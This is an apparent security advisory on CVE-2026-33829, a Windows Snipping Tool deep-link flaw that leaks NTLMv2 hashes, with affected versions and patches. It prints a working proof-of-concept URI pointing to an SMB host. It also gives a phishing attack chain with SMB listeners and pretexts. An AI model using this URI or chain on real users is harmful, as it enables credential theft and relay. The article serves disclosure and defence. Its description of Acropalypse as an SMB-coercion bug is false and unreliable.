TL;DR

CVE-2026-33829 is a spoofing flaw in the Windows Snipping Tool that leaks a user's NTLMv2 hash over the network. The app's ms-screensketch deep link fails to validate the filePath parameter, so a crafted URI forces an SMB connection to an attacker-controlled server. CVSS 3.1 = 4.3 (Moderate), but the impact on enterprise networks is real: pass-the-hash and NTLM relay. Microsoft shipped fixes on April 14, 2026; BlackArrowSec published the PoC on April 15, 2026. There is no app-level workaround — patch now.

What's new

Researcher Margaruga from the BlackArrowSec Red Team coordinated disclosure with Microsoft on March 23, 2026. The public advisory and patches landed with Patch Tuesday on April 14, 2026, and the full technical writeup plus proof-of-concept went live on the BlackArrowSec GitHub repository the next day. SecurityOnline and HTMD Blog followed with mainstream coverage.

The vulnerability lives in the Snipping Tool's app manifest, which registers the ms-screensketch protocol via a uap:Protocol extension. Any browser or app that can open a URI can now coerce Snipping Tool into behavior the user never intended.

Why it matters

NTLMv2 hashes are not just password leftovers. On most enterprise Windows networks they are directly usable for pass-the-hash against SMB/LDAP endpoints that lack signing and Extended Protection for Authentication (EPA), or can be relayed in real time to authenticate as the victim against other servers. Offline cracking is the fallback when relay is not possible.

The social-engineering angle is the part that makes this ugly. Snipping Tool actually opens on the victim's screen, so the pretext — "crop this corporate wallpaper", "edit your badge photo" — looks legitimate. The NTLM authentication happens invisibly in the background while the user is busy cropping an image.

Technical facts

  • CVE: CVE-2026-33829
  • CVSS 3.1 base: 4.3 (Moderate); environmental 3.8
  • CWE: CWE-200 — Exposure of Sensitive Information
  • Attack vector: Network, Low complexity, no privileges, user interaction required
  • Impact: Confidentiality only — no integrity or availability loss
  • Discoverer: Margaruga, BlackArrowSec Red Team
  • Affected: 31 platform variants — Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (21H2 through 26H1), Windows Server 2012 through 2025
  • Exploit code maturity: Unproven; no in-the-wild exploitation reported

The published proof-of-concept URI is a single line:

ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast

Stand up an SMB listener (Responder, impacket-smbserver, or similar), open the URL in a browser, accept the "Open Snipping Tool?" prompt, and the hash lands in the attacker's log.

Attack chain

  1. Attacker runs an SMB listener on a reachable host (snip.attacker.tld).
  2. Crafts ms-screensketch:edit link with filePath pointing to that UNC path.
  3. Delivers link via phishing email, compromised site, or a redirector whose URL looks like a plain image (https://snip.example.com/wallpaper/image.png) but serves HTML that auto-navigates to the deep link.
  4. Victim clicks; browser asks to launch Snipping Tool; user confirms.
  5. Snipping Tool opens and silently fetches the file over SMB; Windows performs NTLMv2 authentication against the attacker's server.
  6. Attacker captures the NTLMv2 response — offline crack or live relay.

Real-world scenarios

The bug is a gift for red teamers and phishing-led intrusions. Expected pretexts:

  • "Update your corporate wallpaper before the all-hands" — hosted on an internal-looking domain
  • "Crop your new badge photo for the HR portal"
  • "Review and annotate this draft diagram" embedded in a Teams or email message

Standalone home users are not safe either — their hash is still usable for offline cracking, and the Snipping Tool ships enabled by default on Windows 10 and 11.

Limitations & mitigation

User interaction is required: the victim must click and confirm the app-launch prompt. That is a weak barrier in phishing-heavy environments. The flaw does not yield code execution or system compromise on its own — only the hash.

Microsoft states there is no application-level workaround. Patching is mandatory:

  • Install April 2026 Windows Security Updates — including KB5082200 (Win10 22H2), KB5083769 (Win11 24H2/25H2), and the matching KBs for Windows 11 23H2, Windows 10 1607/1809, and Windows Server 2016/2019/2022/2025
  • Block outbound SMB (TCP/445) at the perimeter to stop NTLM hashes from reaching the internet
  • Enforce SMB signing and Extended Protection for Authentication on internal services to defeat relay
  • Disable NTLM where you can; prefer Kerberos and negotiate-only policies
  • Train users: any "Open app?" prompt triggered by a webpage deserves a second look

What's next

Expect derivative tooling fast. Public PoC + Responder is the minimum-viable kit for a red team to weaponize this, and similar deep-link SMB-coercion bugs have shown up before in Windows (CVE-2023-28303 Acropalypse being the most visible Snipping Tool precedent). Watch for researchers auditing other built-in apps that register custom URI schemas — the manifest pattern that broke here is not unique to Snipping Tool.

If you run Windows estates: push the April 2026 updates through WSUS / Intune today, audit your SMB egress rules, and assume any unpatched host that clicked a suspicious link over the last week has already coughed up a hash.

Sources: BlackArrowSec advisory, SecurityOnline, Cybersecurity News, HTMD Blog.